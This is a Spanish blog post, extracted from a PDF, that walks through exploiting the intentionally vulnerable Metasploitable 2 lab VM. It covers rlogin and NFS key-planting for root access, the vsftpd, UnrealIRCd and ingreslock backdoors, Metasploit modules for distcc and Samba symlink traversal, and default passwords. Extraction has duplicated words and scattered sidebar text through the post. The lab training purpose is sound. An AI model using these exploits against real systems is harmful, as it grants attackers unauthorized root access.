HackNode - Guía de Explotabilidad de Metasploitable 2

November 17, 2022 | Author: Anonymous | Category: N/A
Share Embed Donate


Short Description

Download HackNode - Guía de Explotabilidad de Metasploitable 2...

Description

 

21/12/2016

HackNode: Guía de Explotabilidad de Metasploitable 2 1

  Más

Siguiente blog»

[email protected]   Escritorio   Salir 

HackNode You can hack some stuff too! 5

miércoles, mi ércoles, 13 de junio de 2012

Twitter  Tweets by @DarkOperator 

Guía de Explotabilidad de Metasploitable Metasploitable 2 Metasploitable 2 Seguidores La máquina virtual Metasploitable es una versión de Ubuntu Linux intencionalmente vulnerable diseñada para probar herramientas de seguridad y demostrar vulnerabilidades comunes. La versión 2 de esta máquina virtual se encuentra disponible para la descarga desde Sourceforge.net y contiene aún muchas más vulnerabilidades vulnerabilidades que la imágen original. Esta máquina virtual es compatible con VMWare, VirtualBox, y otra otras s plataformas de virtualización comunes. De manera predeterminada, las interfaces de red de Metasploitable se encuentran atadas a los adaptadores de red NAT y Host-only, y la imagen no debe exponerse a una red hostíl. Este artículo describe muchas de las fallas de seguridad en la imagen de Metasploitable 2. En la actualidad hace falta documen taci tación ón sobre el servidor  web y las fallas de aplicaciones web, así como las vulnerabilidades vulnerabilidades   que permiten a un usuario local escalar a privilegios de root. Este documento se seguirá ampliando con el tiempo a medida que mu que  muchos chos de  de los defe defectos ctos menos evidentes en esta plataforma se vayan encontrando.

Seguidores (22) Siguiente

Seguir 

Primeros Pasos Archivo del blog Después de arrancar la máquina virtual, inicie sesión en la consola con el usuario msfadmin y contraseña msfadmin msfadmin.. Desde la shell, ejecute el comando ifconfig para identificar la dirección IP.

► 2013 (4) ▼ 2012 (13) ► septiembre (2)

1 2 3 4 5 6

[email protected]:~$ ifconfig ?   eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1 Link inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:   inet6 addr: fe80::20c:29ff:fe9a:52c1/64  fe80::20c:29ff:fe9a:52c1/64 Scope:Link   UP BROADCAST BROADCAST RUNNING RUNNING MULTICAST MTU:1500 Me Metric:1 tric:1

Servicios Desde nuestro sistema de ataque (Linux, preferiblemente algo como Backtrack), identificaremos los servicios de red abiertos en esta máquina virtual utilizando el Scanner de Seguridad Nmap. Nmap. La siguiente línea de comando analizará todos los puertos TCP en la instancia de Metasploitable 2:

► agosto (5) ▼  junio (2) Guía de Explotabilidad de Metasploitable 2 Cómo defendernos de los Google Hackers ► mayo (2) ► marzo (1) ► febrero (1)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

[email protected]:~# nmap -p0-65535 192.168.99.131 [email protected]:~# ? Starting Starti ng Nmap 5.61TEST4 5.61TEST4 ( http://nmap.o http://nmap.org rg ) at 2012-05-31 21: 21:1 1 Nmap scan report for for   192.168.99.131 Host is up (0.00028s latency). Not shown: 65506 closed ports PORT STATE SERVICE 21/tcp  21/tcp   open  open   ftp 22/tcp  22/tcp   open  open   ssh 23/tcp  23/tcp   open  open   telnet 25/tcp  25/tcp   open  open   smtp 53/tcp  53/tcp   open  open   domain 80/tcp  80/tcp   open  open   http 111/tcp  111/tcp   open open    rpcbind 139/tcp  139/tcp   open open    netbios-ssn 445/tcp  445/tcp   open open    microsoft-ds

  http://hacknode.blogspot.pe/2012/06/guia-de-explotabilidad-de.html

► 2011 (23) ► 2010 (2)

Datos personales

1/6

 

21/12/2016

HackNode: Guía de Explotabilidad de Metasploitable 2

16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

512/tcp  512/tcp  513/tcp  513/tcp   514/tcp  514/tcp   1099/tcp  1099/tcp   1524/tcp  1524/tcp   2049/tcp  2049/tcp   2121/tcp  2121/tcp   3306/tcp  3306/tcp   3632/tcp  3632/tcp   5432/tcp  5432/tcp   5900/tcp  5900/tcp   6000/tcp  6000/tcp   6667/tcp  6667/tcp   6697/tcp  6697/tcp   8009/tcp  8009/tcp   8180/tcp  8180/tcp   8787/tcp  8787/tcp  

open  open  open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open   open  open  

exec login shell rmiregistry ingreslock nfs ccproxy-ftp ccproxyftp mysql distccd postgresql vnc X11 irc unknown ajp13 unknown unknown

33 34 35 36 37

39292/tcp  39292/tcp  open open  open   unknown unknown 43729/tcp 43729/tcp    open    44813/tcp  44813/tcp  open open    unknown 55852/tcp  55852/tcp  open open    unknown MAC Address: 00:0C:29:9A:52:C1 (VMware)

DarkOperator   Alpha_Geek/Daddy/Ethical_Ha cker/InfoSec_Professional/Co mic_Fanboy/Clone_Trooper  Ver todo mi perfil

Casi todos estos servicios en escucha proporcionan un punto de entrada remoto en el sistema. En la siguiente sección, caminaremos a través de algunos de estos vectores.

Servicios: Báses de Unix Los puertos TCP 512, 513, y 514 son conocidos como los servicios "r", y han sido configurados erróneamente para permitir acceso remoto desde cualquier máquina (una situación típica ".rhosts + +"). Para tomar ventaja de esto, nos aseguraremos de que el cliente rsh-client   se encuentre instalado (en Ubuntu), y ejecutamos el siguiente comando como usuario root local. Si se nos solicita una llave SSH, esto significa que las herramientas rsh-client no han sido instaladas y Ubuntu está predeterminando a utilizar SSH.

1 2 3 4

# rlogin -l root 192.168.99.131 ? Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0 Linux metasploitable 2.6.24-16-server #1 SMP SMP Thu Apr 10 10 13:58: 13:58:0 0 [email protected]:~# [email protected]:~ #

Esto se pone tan bueno como se vé. El próximo servicio que debe tener en cuenta es el sistema de archivos de red (NFS). NFS puede ser identificado sondeando el puerto 2049 directamente o pidiendo a portmapper obtener una lista de servicios. El siguiente ejemplo usando rpcinfo para identificar NFS y showmount -e  -e  para determinar que el recurso compartido " /"  /" (la raíz del sistema de archivos) estará siendo exportado. Necesitaremos los paquetes de Ubuntu rpcbind y nfs-common nfs-common para  para seguir adelante.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

[email protected]:~# rpcinfo [email protected]:~#   program vers proto   100000 2 tcp   100000 2 udp   100024 1 udp   100024 1 tcp   100003 2 udp   100003 3 udp   100003 4 udp   100021 1 udp   100021 3 udp   100021 4 udp   100003 2 tcp   100003 3 tcp   100003 4 tcp   100021 1 tcp   100021 3 tcp   100021 4 tcp

-p 192.168.99.131 port service 111 portmapper 111 portmapper 53318 status 43729 status 2049 nfs 2049 nfs 2049 nfs 46696 nlockmgr 46696 nlockmgr 46696 nlockmgr 2049 nfs 2049 nfs 2049 nfs 55852 nlockmgr 55852 nlockmgr 55852 nlockmgr

19 20 21 22 23 24 25 26

  100005 1 udp   100005 1 tcp 34887 39292 mountd mountd   100005 2 udp 34887 mountd   100005 2 tcp 39292 mountd   100005 3 udp 34887 mountd   100005 3 tcp 39292 mountd   [email protected]:~# [email protected]:~ # showmount -e 192.168.99.131

  http://hacknode.blogspot.pe/2012/06/guia-de-explotabilidad-de.html

?

2/6

 

21/12/2016 27 28

HackNode: Guía de Explotabilidad de Metasploitable 2 Export list for for   192.168.99.131: / *

Obtener acceso a un sistema con un sistema de archivos modificable como este es algo trivial. Para que sea así (y porque SSH está ejecutándose), generaremos una nueva llave SSH en nuestro sistema atacante, montamos el export NFS y agregamos nuestra llave al archivo authorized_keys authorized_keys de  de la cuenta de usuario root:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

[email protected]:~# ssh-keygen [email protected]:~# Generating public/private  public/private rsa key pair. Enter file file   in in   which which   to save the key (/root/.ssh (/root/.ssh/id_rsa): /id_rsa): Enter passphrase (empty for for   no passphrase):

?

Enteridentification same passphrase again: Your has been saved in in   /root/. /root/.ssh ssh/id_rsa. /id_rsa. Your public key has been saved in in   /root/. /root/.ssh ssh/id_rsa.pub. /id_rsa.pub.   [email protected]:~# [email protected]:~ # mkdir /tmp/r00t [email protected]:~# [email protected]:~ # mount -t nfs 192.168.99.131:/ /tmp/r00t/ [email protected]:~# [email protected]:~ # cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/au [email protected]:~# [email protected]:~ # umount /tmp/r00t   [email protected]:~# [email protected]:~ # ssh [email protected] Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128 Linux metasploitable 2.6.24-16-server #1 SM SMP P Thu Thu Ap Apr r 10 10 13: 13:58 58: : [email protected]:~# [email protected]:~ #

Servicios: Backdoors En el puerto 21, Metasploitable 2 ejecuta vsftpd , un servidor FTP popular. Esta versión en particular contiene una puerta trasera (backdoor) trasera (backdoor) que fue introducida en el código fuente por  un intruso desconocido. El backdoor fue rápidamente identificado y eliminado, pero no antes de que unas cuantas personas ya lo hubieran descargado. Si un nombre de usuario es enviado terminando con la secuencia " :) :) "  " (carita felíz), la versión con el backdoor abrirá una shell en escucha en el puerto 6200. Podemos demostrar esto con telnet o utilizando un módulo de Metasploit Framework para Framework para explotarlo automáticamente:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18

[email protected]:~# telnet 192.168.99.131 21 [email protected]:~# Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]' '^]'. . 220 (vsFTPd 2.3.4) user backdoored:) 331 Please specify the password. pass invalid ^]

?

telnet> quit Connection closed.   [email protected]:~# [email protected]:~ # telnet 192.168.99.131 6200 Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]' '^]'. . id; id ; uid=0(root) gid=0(root)

En el puerto 6667, Metasploitable 2 corre el demonio IRC UnreaIRCD UnreaIRCD.. Esta versión contiene un backdoor que pasó desapercibido por meses, meses, - disparado al enviar las letras "AB" seguidas de un comando del sistema al servidor en cualquier puerto en escucha. Metasploit tiene un módulo módulo   para explotar esto con el fin de obtener una shell interactiva, como se muestra a continuación.

1 2 3 4 5 6 7 8

? msfconsole msf > use exploit/unix/irc/unreal_ircd_3281_backdoor msf exploit(unreal_ircd_3281_backdoor) > set set   RHOST 192.168.99 msf exploit(unreal_ircd_3281_backdoor) > exploit [*] Started reverse double handler [*] Connected to 192.168.99.131:6667...   :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your h   :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve

http://hacknode.blogspot.pe/2012/06/guia-de-explotabilidad-de.html

3/6

 

21/12/2016 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23

HackNode: Guía de Explotabilidad de Metasploitable 2 [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*] [*]

Sending backdoor command command... ... Accepted the first client connection... Accepted the second client connection... Command: echo echo   8bMUYsfmGvOLHBxe; Writing to socket A Writing to socket B Reading from sockets... Reading from socket B B: "8bMUYsfmGvOLHBxe\r\n" Matching... A is input... Command shell session 1 opened (192.168.99.128:4444 -> 192

id uid=0(root) gid=0(root)

ingreslock"" que escucha en el puerto Mucho menos sutíl es el viejo backdoor remanente ""ingreslock 1524. El puerto ingreslock era una opción popular hace una década para agregar una puerta trasera a un servidor comprometido. Accederlo es fácil:

1 2 3 4 5 6

[email protected]:~# telnet 192.168.99.131 1524 [email protected]:~# Trying 192.168.99.131... Connected to 192.168.99.131. Escape character is '^]' '^]'. . [email protected]:/# [email protected]:/ # id uid=0(root) gid=0(root) groups groups=0(root) =0(root)

?

Servicios: Backdoors No-Intencionales  Además de las puertas p uertas traseras maliciosas de la sección anterior, algunos servicios son casi puertas traseras por su propia naturaleza. El primero de estos que está instalado en Metasploitable 2 es distccd . Este programa hace que sea fácil escalar grandes tareas de compilación a través de una granja de sistemas que aparentan estar configurados para tal fin. El problema con este servicio es que un atacante puede abusar de este para ejecutar un comando a su elección, como lo demuestra el uso del módulo de Metasploit a Metasploit a continuación.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

msfconsole ? msf > use exploit/unix/misc/distcc_exec msf exploit(distcc_exec) > set set   RHOST 192.168.99.131 msf exploit(distcc_exec) > exploit   [*] Started reverse double handler [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo echo   uk3UdiwLUq0LX3Bi; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "uk3UdiwLUq0LX3Bi\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.99.128:4444 -> 192 id uid=1(daemon) gid=1(daemon) groups groups=1(daemon) =1(daemon)

Samba, cuando se configura con un recurso de archivos compartidos y enlaces extensos Samba, (wide links) links) habilitados (los cuales vienen activados por defecto), puede utilizarse tambien como un tipo de puerta trasera para acceder archivos que no estaban destinados a ser  compartidos. El siguiente ejemplo utiliza un módulo de Metasploit para Metasploit para proporcionar acceso al sistema de archivos raíz utilizando una conexión anónima y un recurso compartido con acceso de escritura.

1 2 3 4 5

[email protected]:~# smbclient -L //192.168.99.131 [email protected]:~# Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]   Sharename Type Comment   ------------------

  http://hacknode.blogspot.pe/2012/06/guia-de-explotabilidad-de.html

?

4/6

 

21/12/2016

HackNode: Guía de Explotabilidad de Metasploitable 2

6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22

     

print$ tmp opt IPC$ ADMIN$

Disk Disk Disk IPC IPC

Printer Drivers oh noes!

23 24 25 26 27 28 29 30 31 32 33 34 35 36

  msf auxiliary(samba_symlink_traversal) > exit   [email protected]:~# [email protected]:~ # smbclient //192.168.99.131/tmp Anonymous login successful Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian] smb: \> cd cd   rootfs smb: \rootfs\> cd cd   etc smb: \rootfs\etc\> more more   passwd getting file file   \rootfs\etc\ \rootfs\etc\passwd passwd   of size 1624 as /tmp/smbmore.u root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh [..]

IPC Service (metasploitable IPC Service (metasploitable

[email protected]:~# msfconsole [email protected]:~# msf > use auxiliary/admin/smb/samba_symlink_traversal msf auxiliary(samba_symlink_traversal) > set set   RHOST 192.168.99 msf auxiliary(samba_symlink_traversal) > set set   SMBSHARE tmp msf auxiliary(samba_symlink_traversal) > exploit   [*] Connecting to the server... [*] Trying to mount mount   writeable share 'tmp' 'tmp'... ... [*] Trying to link 'rootfs' 'rootfs'   to the root filesystem... [*] Now access the following share to browse the root filesyst [*] \\192.168.99.131\tmp\rootfs\

Contraseñas Débiles  Adicionalmente a las más flagrantes puertas traseras y errores de configuración, Metasploitable 2 tiene terrible seguridad de contraseña tanto para la cuenta del sistema como para la cuenta del servidor de base de datos. El usuario principal de administración msfadmin tiene una contraseña que coincide con el nombre de usuario. Al descubrir la lista de los usuarios en este sistema, ya sea mediante el uso de otro defecto para capturar el archivo  passwd , o mediante la enumeración de estos identificadores de usuario a través de Samba, un ataque de fuerza bruta puede ser utilizado para acceder rápidamente a varias cuentas de usuario. Como mínimo, las siguientes cuentas débiles del sistema están configuradas en el sistema. Nombre Nom bre Cuenta Cuenta Con Contra traseñ seña a msfadmin

msfadmin

user

user  

postgres

postgres

sys

batman

klog

123456789

service

service

 Adicional a estas cuentas a nivel de sistema, el servicio de PostgreSQL PostgreSQL puede  puede ser accedido con el nombre de usuario  postgres y contraseña  postgres  postgres,, mientras que el servicio de MySQL   está abierto con el nombre de usuario root y con una contraseña en blanco. El MySQL servicio de VNC VNC   proporciona el acceso de escritorio remoto a través de la contraseña  password .

Crossposted from Metasploitable 2 Exploitability Guide  

2:25   Publicado por DarkOperator en 2:25 +1 Recomendar esto en Google

Etiquetas: backdoor , Backtrack Backtrack,, linux linux,, Metasploit Metasploit,, Metasploitable Metasploitable,, Metasploitable2 Metasploitable2,, msfadmin,, NFS msfadmin NFS,, Nmap Nmap,, postgres postgres,, Samba Samba,, SSH SSH,, Ubuntu Ubuntu,, unix unix,, vsftpd

http://hacknode.blogspot.pe/2012/06/guia-de-explotabilidad-de.html

5/6

 

21/12/2016

Entrada más reciente

HackNode: Guía de Explotabilidad de Metasploitable 2

Página principal

Entrada antigua

Plantilla Fantástico, S.A.. Con la tecnología de Blogger .

http://hacknode.blogspot.pe/2012/06/guia-de-explotabilidad-de.html

6/6

View more...

Comments

Copyright ©2017 KUPDF Inc.
SUPPORT KUPDF